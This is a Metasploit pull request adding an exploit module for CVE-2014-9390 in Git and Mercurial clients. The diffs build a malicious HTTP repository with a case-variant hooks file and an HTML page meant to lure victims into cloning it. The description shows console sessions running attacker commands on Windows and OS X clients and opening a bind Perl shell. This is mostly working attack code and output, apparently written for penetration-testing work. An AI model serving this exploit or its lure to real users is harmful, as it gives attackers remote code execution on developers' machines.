### PR TITLE
Add module for Git/Mercurial CVE-2014-9390

### DIFF
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -99,6 +99,10 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def setup
+    # the exploit requires that we act enough like a real Mercurial HTTP instance,
+    # so we keep a mapping of all of the files and the corresponding data we'll
+    # send back along with a trigger file that signifies that the git/mercurial
+    # client has fetched the malicious content.
     @repo_data = {
       git: { files: {}, trigger: nil },
       mercurial: { files: {}, trigger: nil }
@@ -107,6 +111,7 @@ class Metasploit4 < Msf::Exploit::Remote
     unless datastore['GIT'] || datastore['MERCURIAL']
       fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
     end
+
     setup_git
     setup_mercurial
 
@@ -116,7 +121,6 @@ class Metasploit4 < Msf::Exploit::Remote
   def setup_git
     return unless datastore['GIT']
     # URI must start with a /
-    puts "FOOO #{git_uri}"
     unless git_uri && git_uri =~ /^\//
       fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')
     end
@@ -125,16 +129,22 @@ class Metasploit4 < Msf::Exploit::Remote
       fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank')
     end
 
-    # This builds a fake git repository using the knowledge from:
-    # http://schacon.github.io/gitbook/7_how_git_stores_objects.html
-    # http://schacon.github.io/gitbook/7_browsing_git_objects.html
+    # In .git/hooks/ directory, specially named files are shell scripts that
+    # are executed when particular events occur.  For example, if
+    # .git/hooks/post-checkout was an executable shell script, a git client
+    # would execute that file every time anything is checked out.  There are
+    # various other files that can be used to achieve similar goals but related
+    # to committing, updating, etc.
     #
-    # It creates a .giT/hooks/post-checkout file that contains a command to
-    # execute.  Because the full path of this file will be considered identical
-    # on case-insensitive filesystems and will be use in place of
-    # .git/hooks/post-checkout and will subsequently execute commands of our
-    # choosing upon cloning
-    # build the hook file blob
+    # This vulnerability allows a specially crafted file to bypass Git's
+    # blacklist and overwrite the sensitive .git/hooks/ files which can allow
+    # arbitrary code execution if a vulnerable Git client can be convinced to
+    # interact with a malicious Git repository.
+    #
+    # This builds a fake git repository using the knowledge from:
+    #
+    #   http://schacon.github.io/gitbook/7_how_git_stores_objects.html
+    #   http://schacon.github.io/gitbook/7_browsing_git_objects.html
     case target.name
     when 'Automatic'
       full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
@@ -216,17 +226,20 @@ class Metasploit4 < Msf::Exploit::Remote
     fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'
     @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n"
     # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat
-    @repo_data[:mercurial][:files]["?cmd=getbundle&common=0000000000000000000000000000000000000000&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
+    @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0'*40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
 
     # TODO: finish building the fake repository
   end
 
+  # Build's a Git object
   def build_object(type, content)
+    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
     header = "#{type} #{content.size}\0"
     store = header + content
     [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
   end
 
+  # Returns the Git object path name that a file with the provided SHA1 will reside in
   def get_path(sha1)
     sha1[0...2] + '/' + sha1[2..40]
   end
@@ -247,6 +260,7 @@ class Metasploit4 < Msf::Exploit::Remote
     end
   end
 
+  # handles routing any request to the mock git, mercurial or simple HTML as necessary
   def on_request_uri(cli, req)
     # if the URI is one of our repositories and the user-agent is that of git/mercurial
     # send back the appropriate data, otherwise just show the HTML version
@@ -263,6 +277,7 @@ class Metasploit4 < Msf::Exploit::Remote
     do_html(cli, req)
   end
 
+  # simulates a Git HTTP server
   def do_git(cli, req)
     # determine if the requested file is something we know how to serve from our
     # fake repository and send it if so
@@ -283,6 +298,8 @@ class Metasploit4 < Msf::Exploit::Remote
     end
   end
 
+  # simulates an HTTP server with simple HTML content that lists the fake
+  # repositories available for cloning
   def do_html(cli, _req)
     resp = create_response
     resp.body = <<HTML
@@ -315,6 +332,7 @@ HTML
     cli.send_response(resp)
   end
 
+  # simulates a Mercurial HTTP server
   def do_mercurial(cli, req)
     # determine if the requested file is something we know how to serve from our
     # fake repository and send it if so

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -84,8 +84,7 @@ class Metasploit4 < Msf::Exploit::Remote
     register_options(
       [
         OptBool.new('GIT', [true, 'Exploit Git clients', true]),
-        OptBool.new('MERCURIAL', [true, 'Exploit Mercurial clients', false]),
-        #OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
+        OptBool.new('MERCURIAL', [true, 'Exploit Mercurial clients', false])
       ]
     )
 

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -67,7 +67,7 @@ class Metasploit4 < Msf::Exploit::Remote
                     {
                       'PayloadType' => 'cmd cmd_bash',
                       'RequiredCmd' => 'generic bash-tcp perl bash'
-                    },
+                    }
                 }
             }
           ],
@@ -103,7 +103,7 @@ class Metasploit4 < Msf::Exploit::Remote
       mercurial: { files: {}, trigger: nil }
     }
     if git_uri.blank? && mercurial_uri.blank?
-      fail ArgumentError, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI'
+      fail_with(Exploit::Failure::BadConfig, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI')
     end
     setup_git unless git_uri.blank?
     setup_mercurial unless mercurial_uri.blank?
@@ -113,9 +113,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def setup_git
     # URI must start with a /
-    fail ArgumentError, 'GIT_URI must start with a /' unless git_uri =~ /^\//
+    unless git_uri =~ /^\//
+      fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')
+    end
     # sanity check the malicious hook:
-    fail ArgumentError, 'GIT_HOOK must not be blank' if datastore['GIT_HOOK'].blank?
+    if datastore['GIT_HOOK'].blank?
+      fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank')
+    end
 
     # This builds a fake git repository using the knowledge from:
     # http://schacon.github.io/gitbook/7_how_git_stores_objects.html
@@ -191,9 +195,13 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def setup_mercurial
     # URI must start with a /
-    fail ArgumentError, 'MERCURIAL_URI must start with a /' unless mercurial_uri =~ /^\//
-    # sanity check the malicious hook:
-    fail ArgumentError, 'MERCURIAL_HOOK must not be blank' if datastore['MERCURIAL_HOOK'].blank?
+    unless mercurial_uri =~ /^\//
+      fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')
+    end
+    # sanity check the malicious hook
+    if datastore['MERCURIAL_HOOK'].blank?
+      fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
+    end
     # we fake the Mercurial HTTP protocol such that we are compliant as possible but
     # also as simple as possible so that we don't have to support all of the protocol
     # complexities.  Taken from:

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -180,19 +180,16 @@ class Metasploit4 < Msf::Exploit::Remote
     git_dir = '.' + variants.sample
     sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
-    # build the supposed commit that dropped this file
-    # a random user and user name
-    user = rand_text_alphanumeric(3 + rand(10)) + ' ' + rand_text_alphanumeric(3 + rand(10))
-    user_name = user.downcase.gsub(/\s+/, '_')
-    # random company
-    company = (rand_text_alphanumeric(3 + rand(10)) + '.' + %w(com net org).sample).downcase
-    # random commit and author time stamps
+    # build the supposed commit that dropped this file, which has a random user/company
+    email = Rex::Text.rand_mail_address
+    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
+    full_name = "#{first.capitalize} #{last.capitalize}"
     tstamp = Time.now.to_i
     author_time = rand(tstamp)
     commit_time = rand(author_time)
     tz_off = rand(10)
-    commit = "author #{user} <#{user_name}@#{company}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{user} <#{user_name}@#{company}> #{commit_time} -0#{tz_off}00\n" \
+    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
+             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
              "\n" \
              "Initial commit to open git repository for #{company}!\n"
     if datastore['VERBOSE']
@@ -226,7 +223,7 @@ class Metasploit4 < Msf::Exploit::Remote
     fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'
     @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n"
     # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat
-    @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0'*40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
+    @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
 
     # TODO: finish building the fake repository
   end

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote
                   'Compat'      =>
                     {
                       'PayloadType' => 'cmd cmd_bash',
-                      'RequiredCmd' => 'generic bash-tcp'
+                      'RequiredCmd' => 'generic bash-tcp perl bash'
                     },
                 }
             }

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -83,14 +83,16 @@ class Metasploit4 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']),
-        OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']),
-        OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
+        OptBool.new('GIT', [true, 'Exploit Git clients', true]),
+        OptBool.new('MERCURIAL', [true, 'Exploit Mercurial clients', false]),
+        #OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
       ]
     )
 
     register_advanced_options(
       [
+        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
+        OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
         OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
         OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update'])
       ]
@@ -102,18 +104,21 @@ class Metasploit4 < Msf::Exploit::Remote
       git: { files: {}, trigger: nil },
       mercurial: { files: {}, trigger: nil }
     }
-    if git_uri.blank? && mercurial_uri.blank?
-      fail_with(Exploit::Failure::BadConfig, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI')
+
+    unless datastore['GIT'] || datastore['MERCURIAL']
+      fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
     end
-    setup_git unless git_uri.blank?
-    setup_mercurial unless mercurial_uri.blank?
+    setup_git
+    setup_mercurial
 
     super
   end
 
   def setup_git
+    return unless datastore['GIT']
     # URI must start with a /
-    unless git_uri =~ /^\//
+    puts "FOOO #{git_uri}"
+    unless git_uri && git_uri =~ /^\//
       fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /')
     end
     # sanity check the malicious hook:
@@ -194,8 +199,9 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def setup_mercurial
+    return unless datastore['MERCURIAL']
     # URI must start with a /
-    unless mercurial_uri =~ /^\//
+    unless mercurial_uri && mercurial_uri =~ /^\//
       fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /')
     end
     # sanity check the malicious hook
@@ -232,18 +238,18 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def primer
     # add the git and mercurial URIs as necessary
-    hardcoded_uripath(git_uri) unless git_uri.blank?
-    hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank?
+    hardcoded_uripath(git_uri) if datastore['GIT']
+    hardcoded_uripath(mercurial_uri) if datastore['MERCURIAL']
   end
 
   def on_request_uri(cli, req)
     # if the URI is one of our repositories and the user-agent is that of git/mercurial
     # send back the appropriate data, otherwise just show the HTML version
     if (user_agent = req.headers['User-Agent'])
-      if user_agent =~ /^git\// && req.uri.start_with?(git_uri) && !git_uri.blank?
+      if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
         do_git(cli, req)
         return
-      elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) && !mercurial_uri.blank?
+      elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
         do_mercurial(cli, req)
         return
       end
@@ -282,18 +288,18 @@ class Metasploit4 < Msf::Exploit::Remote
         <ul>
 HTML
 
-    if git_uri.blank?
-      resp.body << "<li><a>Git</a> (currently offline)</li>"
-    else
+    if datastore['GIT']
       this_git_uri = URI.parse(get_uri).merge(git_uri)
       resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
+    else
+      resp.body << "<li><a>Git</a> (currently offline)</li>"
     end
 
-    if mercurial_uri.blank?
-      resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
-    else
+    if datastore['MERCURIAL']
       this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
       resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
+    else
+      resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
     end
     resp.body << <<HTML
         </ul>
@@ -327,11 +333,23 @@ HTML
     end
   end
 
+  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
   def git_uri
-    datastore['GIT_URI']
+    return @git_uri if @git_uri
+    if datastore['GIT_URI'].blank?
+      @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
+    else
+      @git_uri = datastore['GIT_URI']
+    end
   end
 
+  # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI
   def mercurial_uri
-    datastore['MERCURIAL_URI']
+    return @mercurial_uri if @mercurial_uri
+    if datastore['MERCURIAL_URI'].blank?
+      @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase
+    else
+      @mercurial_uri = datastore['MERCURIAL_URI']
+    end
   end
 end

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -47,6 +47,9 @@ class Metasploit4 < Msf::Exploit::Remote
         [
           ['CVE', '2014-9390'],
           ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
+          ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
+          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/12/30/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
+          ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
           ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
           ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
           ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],

--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -237,8 +237,14 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def primer
     # add the git and mercurial URIs as necessary
-    hardcoded_uripath(git_uri) if datastore['GIT']
-    hardcoded_uripath(mercurial_uri) if datastore['MERCURIAL']
+    if datastore['GIT']
+      hardcoded_uripath(git_uri)
+      print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
+    end
+    if datastore['MERCURIAL']
+      hardcoded_uripath(mercurial_uri)
+      print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}")
+    end
   end
 
   def on_request_uri(cli, req)


### PR DESCRIPTION
This doesn't (yet) spawn a shell, but will execute commands of our choosing when a vulnerable client clones our fake repository and `PAYLOAD` == `cmd/unix/generic`.  In addition to my lack of familiarity with exploit modules, I think that I need to rethink how the malicious repository is constructed in order to spawn shells that metasploit can automatically connect to (`regenerate_payload` seems relevant).

This is still a bit of a work in progress, but I welcome anyone else to assist with this PR in making it complete.

Fixes #4435 and makes progress against #4445.  It does this by:
- Hosting a malicious Git HTTP repository 
- Hosting a malicious, not-yet-working and disabled by default Mercurial HTTP repository
- Linking to both of these repositories from a mock HTML page in the hopes of luring someone in

Example in verbose mode:

```
msf > use exploits/multi/http/git_cve_2014_9390
msf exploit(git_cve_2014_9390) > set PAYLOAD cmd/unix/generic 
PAYLOAD => cmd/unix/generic
msf exploit(git_cve_2014_9390) > set CMD "whoami > /tmp/f.txt"
CMD => whoami > /tmp/f.txt
msf exploit(git_cve_2014_9390) > set VERBOSE true
VERBOSE => true
msf exploit(git_cve_2014_9390) > run
[*] Exploit running as background job.

[*] Malicious Git commit of .GiT/post-checkout is:
[*] author pQ5ATdwpqVi d9tYPfEIzCu <pq5atdwpqvi_d9typfeizcu@ubhni5jll.com> 1193845246 -0100
[*] committer pQ5ATdwpqVi d9tYPfEIzCu <pq5atdwpqvi_d9typfeizcu@ubhni5jll.com> 393843866 -0100
[*] 
[*] Initial commit to open git repository for ubhni5jll.com!
msf exploit(git_cve_2014_9390) > [*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://172.16.10.226:8080/
[*] Server started.
[*] Adding hardcoded uri /git
```

Then on a Windows system that has a vulnerable version from https://github.com/msysgit/msysgit/releases/, I clone the malicious repo and see that `/tmp/f.txt` contains my command output:

```
Administrator@win7-git ~
$ rm -f /tmp/f.txt && rm -Rf bad13 &&  /cygdrive/c/Program\ Files\ \(x86\)/Git/bin/git clone http://localhost:8080/git/ bad13 && cat /tmp/f.txt
Cloning into 'bad13'...
Administrator
```

Similarly on a vulnerable OS X host with git from http://sourceforge.net/projects/git-osx-installer/files/ (now broken), with `set ENCODER generic/none` (because `/bin/sh` seems pretty crippled on my test 10.7 system) and `set PAYLOAD cmd/unix/generic``and``CMD`` as with the Windows example:

```
c107unpatched:tmp admin$ rm -f /tmp/f.txt && rm -Rf git && git clone http://localhost:8080/git && cat /tmp/f.txt 
Cloning into 'git'...
Checking connectivity... done
admin
```

With `set PAYLOAD cmd/unix/bind_perl`:

```
c107unpatched:tmp admin$ lsof -ni tcp:4444
c107unpatched:tmp admin$ rm -Rf git && git clone http://localhost:8080/git
Cloning into 'git'...
Checking connectivity... done
c107unpatched:tmp admin$ lsof -ni tcp:4444
COMMAND   PID  USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
perl5.12 8231 admin    3u  IPv4 0xffffff8006aaca40      0t0  TCP *:krb524 (LISTEN)
c107unpatched:tmp admin$ telnet localhost 4444
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
id
uid=501(admin) gid=20(staff) groups=20(staff),401(com.apple.access_screensharing),12(everyone),33(_appstore),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),100(_lpoperator),204(_developer),402(com.apple.sharepoint.group.1)
```

On an unaffected Linux host it does nothing, as expected, because the hook file is in a file by a slightly different name:

```
$  rm -Rf git && git clone http://localhost:8080/git && ls -laR git/.**/hooks/post-checkout
Cloning into 'git'...
-rwxrwxr-x 1 jhart jhart 105 Dec 22 11:44 git/.GiT/hooks/post-checkout

```
